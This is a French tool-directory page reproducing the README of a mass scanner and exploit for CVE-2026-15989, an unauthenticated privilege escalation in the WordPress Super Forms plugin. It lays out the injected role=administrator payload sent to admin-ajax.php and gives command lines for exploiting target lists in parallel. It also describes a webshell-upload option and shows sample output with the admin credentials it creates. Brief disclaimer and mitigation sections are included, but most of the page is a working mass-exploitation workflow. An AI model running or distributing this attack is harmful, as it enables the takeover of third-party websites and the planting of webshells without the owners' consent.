Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

FluxContactConfidentialité© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-15989 — Scanner de masse et exploit pour CVE-2026-15989, l'élévation de privilèges non authentifiée dans Super Forms <= 6.3.316 qui crée des comptes administrateur via le paramètre role. | Kitploit
Outils/GitHubGitHub/fl0ydsec/cve-2026-15989
Escalade de PrivilègesScanners de VulnérabilitésGénération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebPost-ExploitationSécurité WebTests d'Intrusion
GitHubfl0ydsec/cve-2026-15989

CVE-2026-15989

il y a 6h 10mPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Scanner de masse et exploit pour CVE-2026-15989, l'élévation de privilèges non authentifiée dans Super Forms <= 6.3.316 qui crée des comptes administrateur via le paramètre role.

Voir le dépôt

CVE-2026-15989 — Super Forms ≤ 6.3.316 — PoC d'escalade de privilèges non authentifiée

Super Forms – Drag & Drop Form Builder (WordPress) ≤ 6.3.316 — escalade de privilèges non authentifiée via le paramètre role de l'add-on premium Register & Login.

CVE-2026-15989 CVSS WordPress Auth

Author Python Telegram


📋 Aperçu de la vulnérabilité

AttributDétails
CVE IDCVE-2026-15989
Chaîneformulaire d'inscription → 'role' dans $other_userdata → wp_insert_user(role=administrator) → ADMIN
Sévérité🔴 CRITIQUE (CVSS 9.8)
CibleSuper Forms – Drag & Drop Form Builder + add-on premium Register & Login
Affecté≤ 6.3.316 (core) — builds vulnérables de l'add-on (v1.x)
Corrigé6.3.317
Authentification requiseAucune

🔍 Description technique

L'add-on définit le rôle du nouvel utilisateur à partir des paramètres du formulaire ($userdata['role'] = $settings['register_user_role']), puis parcourt $other_userdata — qui contient 'role' — et écrase toute clé avec la valeur fournie par le client ($data['role']['value']) avant d'appeler wp_insert_user().

POST /wp-admin/admin-ajax.php  (unauthenticated)
        │
        ▼
action=super_submit_form + data={"role":{"value":"administrator"}, ...}
        │
        ▼
$other_userdata loop ─► $userdata['role'] = $data['role']['value']
        │
        ▼
wp_insert_user() ─► administrator account created
        │
        ▼
register_login_activation='login'/'auto' ─► wp_set_auth_cookie ─► admin session

Correctif (6.3.317) : 'role' retiré de la liste blanche + get_safe_public_registration_role() (fail-closed).

Recherche originale — protocole à double soumission : le core a changé de protocole à la v5.0.0.

CoreActionFormat des donnéesNonce
4.xsuper_send_emailchamps imbriqués (data[role][value]=...)aucun (vérifications commentées)
5.x/6.xsuper_submit_formchaîne JSONsf_nonce via super_create_nonce

L'outil sélectionne automatiquement le protocole en fonction de la version détectée.


🚀 Utilisation

# mass scan + exploit
python CVE-2026-15989.py --list targets.txt --threads 10 --force --only-hits --results hits.txt --user Floydroot --password 'Floyd@2026!root'
python CVE-2026-15989.py --list targets.txt --threads 15 --timeout 6 --force --quiet --results hits.txt --user U --password P --no-dedup

# single target
python CVE-2026-15989.py --target TARGET --port 443 --user USER --password PASS --email EMAIL --insecure
python CVE-2026-15989.py --target TARGET --port 443 --user USER --password PASS --login --rce --insecure

# re-check an existing account without re-registering
python CVE-2026-15989.py --target TARGET --port 443 --user USER --password PASS --only-login --insecure
OptionDescription
--list FILEUne cible par ligne ; URL|form_id ou URL|form_id=ID,email=X par ligne
-u/--target, --portCible unique
--threads, --timeout, --no-dedupRéglages du mode massif
--forceEnvoie la charge utile même sans formulaire d'inscription détecté
--only-hits / --quietArborescences uniquement pour les cibles confirmées / sortie minimale
--resetfinalisation du mode verify via mot de passe perdu (l'opérateur colle le lien de réinitialisation)
--only-loginIgnore l'inscription ; se connecte et vérifie le rôle via users/me
--login / --rcePost-exploitation sur cible réelle : preuve de connexion / upload de plugin webshell
-k/--insecureIgnorer TLS

📊 Sortie

│  ├─ plugin   : 6.3.316 — VULNERABLE <= 6.3.316
│  ├─ addon    : v1.8.7
│  ├─ form     : 4169 (/register/)
│  ├─ proto    : 5.x/6.x (super_submit_form, JSON, sf_nonce)
│  ├─ payload  : HTTP 200 ✓ processed
│  └─ session  : cookie ✓ · admin confirmed — Floydroot/Floyd@2026!root
└─── ✔ ADMIN CONFIRMED
  • hits.txt — cibles confirmées uniquement (ts|url|status|detail, avec utilisateur/mot de passe)
  • barre avec ETA + compteurs par statut ; chaque phase affiche la raison réelle en cas d'échec (WAF, crash, formulaire de connexion uniquement, mauvais protocole...)

⚙️ Fonctionnalités

  • Double protocole (4.x données imbriquées / 5+ JSON+nonce) — sélectionné automatiquement selon la version
  • Détection de version : balise Stable de readme.txt + common.js?ver= ; sonde de l'add-on + sa propre version
  • Découverte du formulaire d'inscription : chemins courants + sitemap.xml/wp-sitemap.xml/sitemap_index + liens de la page d'accueil
  • Remplissage automatique des champs requis (y compris cachés/conditionnels)
  • « existe déjà » → preuve de connexion directe au compte existant
  • Contrôle des crashs : renvoie le formulaire sans le rôle injecté pour distinguer les problèmes côté serveur des crashs déclenchés par l'injection
  • Preuve admin faisant autorité via /wp-json/wp/v2/users/me?context=edit (repli : users.php / tableau de bord)

📁 Structure des fichiers

├── CVE-2026-15989.py   # mass scanner + exploit
├── README.md
├── LICENSE
└── .gitignore

⚠️ Avertissement

╔══════════════════════════════════════════════════════════════════╗
║                        LEGAL DISCLAIMER                          ║
╠══════════════════════════════════════════════════════════════════╣
║  This tool is provided for EDUCATIONAL and AUTHORIZED           ║
║  SECURITY TESTING purposes only.                                ║
║  Only use on systems you own or have explicit permission.       ║
║  The author is NOT responsible for any misuse or damage.        ║
╚══════════════════════════════════════════════════════════════════╝

🛡️ Atténuation

  1. Mettez à jour Super Forms vers 6.3.317 (ou une version ultérieure) et révoquez tout identifiant compromis
  2. Maintenez l'add-on Register & Login à jour (il a son propre cycle de versions)
  3. Supprimez/désactivez les formulaires d'inscription publiés lorsqu'ils ne sont pas nécessaires
  4. Auditez les utilisateurs de wp-admin/ à la recherche de comptes administrateur inattendus

👤 Auteur

fl0ydsec (Floydroot)

GitHub Telegram

Security Research

Télécharger l’outil